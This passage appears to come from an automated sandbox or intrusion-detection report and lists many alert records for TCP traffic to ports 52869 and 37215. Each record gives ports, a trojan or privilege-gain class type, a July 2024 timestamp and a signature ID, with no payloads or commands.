                      Source Port:47706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2027339
                      Source Port:37584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.483549
                      SID:2025132
                      Source Port:35608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.951018
                      SID:2027339
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2027339
                      Source Port:47604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441224
                      SID:2027339
                      Source Port:57740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.469321
                      SID:2831300
                      Source Port:36992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.098403
                      SID:2025132
                      Source Port:60872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.162873
                      SID:2831300
                      Source Port:58188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2829579
                      Source Port:47510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.613195
                      SID:2025132
                      Source Port:36734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.320646
                      SID:2027339
                      Source Port:34822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.696605
                      SID:2027339
                      Source Port:59206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2025132
                      Source Port:55684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.563600
                      SID:2027339
                      Source Port:34134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:47244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2027339
                      Source Port:37136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.803048
                      SID:2831300
                      Source Port:57020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2835222
                      Source Port:50290
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2829579
                      Source Port:54436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2829579
                      Source Port:39064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2027339
                      Source Port:59170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413313
                      SID:2027339
                      Source Port:52128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.504398
                      SID:2027339
                      Source Port:40270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.265249
                      SID:2027339
                      Source Port:60272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2831300
                      Source Port:45206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.243447
                      SID:2025132
                      Source Port:38852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.424977
                      SID:2835222
                      Source Port:58474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.879176
                      SID:2027339
                      Source Port:53202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.625456
                      SID:2027339
                      Source Port:60582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.159948
                      SID:2835222
                      Source Port:51312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:46790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.482733
                      SID:2025132
                      Source Port:48900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.522009
                      SID:2027339
                      Source Port:49852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.592012
                      SID:2027339
                      Source Port:34676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2831300
                      Source Port:59886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.487097
                      SID:2027339
                      Source Port:54070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.437943
                      SID:2025132
                      Source Port:53578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.414252
                      SID:2025132
                      Source Port:53630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.458631
                      SID:2025132
                      Source Port:33878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.181584
                      SID:2831300
                      Source Port:58720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.598269
                      SID:2025132
                      Source Port:40270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.375612
                      SID:2027339
                      Source Port:45432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323648
                      SID:2835222
                      Source Port:52592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.041200
                      SID:2027339
                      Source Port:43504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.633139
                      SID:2025132
                      Source Port:45162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.246053
                      SID:2027339
                      Source Port:60836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.223799
                      SID:2025132
                      Source Port:52360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.290090
                      SID:2831300
                      Source Port:33826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:47258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:55310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.019762
                      SID:2025132
                      Source Port:52220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.224112
                      SID:2025132
                      Source Port:59840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.246846
                      SID:2027339
                      Source Port:36344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2835222
                      Source Port:37492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2829579
                      Source Port:55086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.672304
                      SID:2829579
                      Source Port:60762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.965423
                      SID:2025132
                      Source Port:44910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:52084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557201
                      SID:2829579
                      Source Port:52088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2025132
                      Source Port:54948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.575032
                      SID:2831300
                      Source Port:55228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2027339
                      Source Port:48926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.939285
                      SID:2027339
                      Source Port:41748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489810
                      SID:2831300
                      Source Port:47092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2835222
                      Source Port:35668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515904
                      SID:2829579
                      Source Port:45674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.214918
                      SID:2027339
                      Source Port:32968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.696476
                      SID:2027339
                      Source Port:58884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:38894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.458817
                      SID:2831300
                      Source Port:33338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:53738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.319175
                      SID:2027339
                      Source Port:60310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.315621
                      SID:2831300
                      Source Port:56206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.402930
                      SID:2835222
                      Source Port:35132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:59130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2027339
                      Source Port:36296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.727366
                      SID:2027339
                      Source Port:50370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.767175
                      SID:2025132
                      Source Port:48086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.059855
                      SID:2027339
                      Source Port:43638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.290199
                      SID:2025132
                      Source Port:49284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.727506
                      SID:2025132
                      Source Port:58346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.042861
                      SID:2831300
                      Source Port:55174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:47038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2831300
                      Source Port:44378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.420819
                      SID:2831300
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:33.181510
                      SID:2027339
                      Source Port:58738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.297270
                      SID:2027339
                      Source Port:52708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.902217
                      SID:2027339
                      Source Port:47188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.799314
                      SID:2831300
                      Source Port:39206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.358336
                      SID:2027339
                      Source Port:50238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2027339
                      Source Port:41440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:46706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.559320
                      SID:2025132
                      Source Port:53114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2027339
                      Source Port:55056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2831300
                      Source Port:55056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:40612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.183172
                      SID:2831300
                      Source Port:47866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:33104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.995860
                      SID:2025132
                      Source Port:43888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.961036
                      SID:2025132
                      Source Port:40880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.741053
                      SID:2027339
                      Source Port:35270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.257734
                      SID:2027339
                      Source Port:53800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2831300
                      Source Port:55854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.528851
                      SID:2831300
                      Source Port:52672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.964001
                      SID:2025132
                      Source Port:35564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.677505
                      SID:2835222
                      Source Port:34498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.839035
                      SID:2025132
                      Source Port:37002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.347764
                      SID:2025132
                      Source Port:40786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.556801
                      SID:2831300
                      Source Port:35880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.633204
                      SID:2027339
                      Source Port:56390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.010711
                      SID:2027339
                      Source Port:48188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.382027
                      SID:2027339
                      Source Port:50598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2025132
                      Source Port:47060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2027339
                      Source Port:39888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.442221
                      SID:2831300
                      Source Port:48414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:55.587260
                      SID:2025132
                      Source Port:43864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327719
                      SID:2835222
                      Source Port:60832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2831300
                      Source Port:41440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.533213
                      SID:2025132
                      Source Port:41758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:32884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:50990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2027339
                      Source Port:49050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2027339
                      Source Port:55966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:40292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.244446
                      SID:2831300
                      Source Port:34330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:32.390708
                      SID:2027339
                      Source Port:60752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.320570
                      SID:2025132
                      Source Port:33344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.712014
                      SID:2025132
                      Source Port:54164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.702462
                      SID:2027339
                      Source Port:60482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.265292
                      SID:2025132
                      Source Port:47238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2835222
                      Source Port:55798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.819768
                      SID:2027339
                      Source Port:59374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.824928
                      SID:2027339
                      Source Port:33864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.673677
                      SID:2027339
                      Source Port:51568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.962395
                      SID:2831300
                      Source Port:37872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:48984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2025132
                      Source Port:47790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2829579
                      Source Port:36774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.980733
                      SID:2027339
                      Source Port:32800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.929510
                      SID:2027339
                      Source Port:34790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.058741
                      SID:2027339
                      Source Port:60494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.610819
                      SID:2025132
                      Source Port:43790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.590266
                      SID:2027339
                      Source Port:56416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.433517
                      SID:2831300
                      Source Port:48972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.375612
                      SID:2831300
                      Source Port:45432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.594252
                      SID:2831300
                      Source Port:49932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:42704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2027339
                      Source Port:36808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:35042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2831300
                      Source Port:33902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.476019
                      SID:2025132
                      Source Port:34582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.121675
                      SID:2831300
                      Source Port:38506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.522257
                      SID:2835222
                      Source Port:38748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2025132
                      Source Port:50668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.799314
                      SID:2027339
                      Source Port:39206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.692772
                      SID:2027339
                      Source Port:58418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2027339
                      Source Port:39182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.410817
                      SID:2027339
                      Source Port:57074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2027339
                      Source Port:56586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.454601
                      SID:2027339
                      Source Port:37092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.006516
                      SID:2025132
                      Source Port:35020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.177523
                      SID:2831300
                      Source Port:59026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2831300
                      Source Port:50956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.878715
                      SID:2831300
                      Source Port:38314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:49244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.384864
                      SID:2025132
                      Source Port:44738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.086217
                      SID:2829579
                      Source Port:39928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.183172
                      SID:2027339
                      Source Port:47866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2027339
                      Source Port:51604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.946586
                      SID:2027339
                      Source Port:50674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.840145
                      SID:2025132
                      Source Port:53042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.280682
                      SID:2025132
                      Source Port:56968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.059438
                      SID:2831300
                      Source Port:45334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2831300
                      Source Port:39178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:59200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.978394
                      SID:2831300
                      Source Port:60664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:50092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.672694
                      SID:2027339
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2835222
                      Source Port:50016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
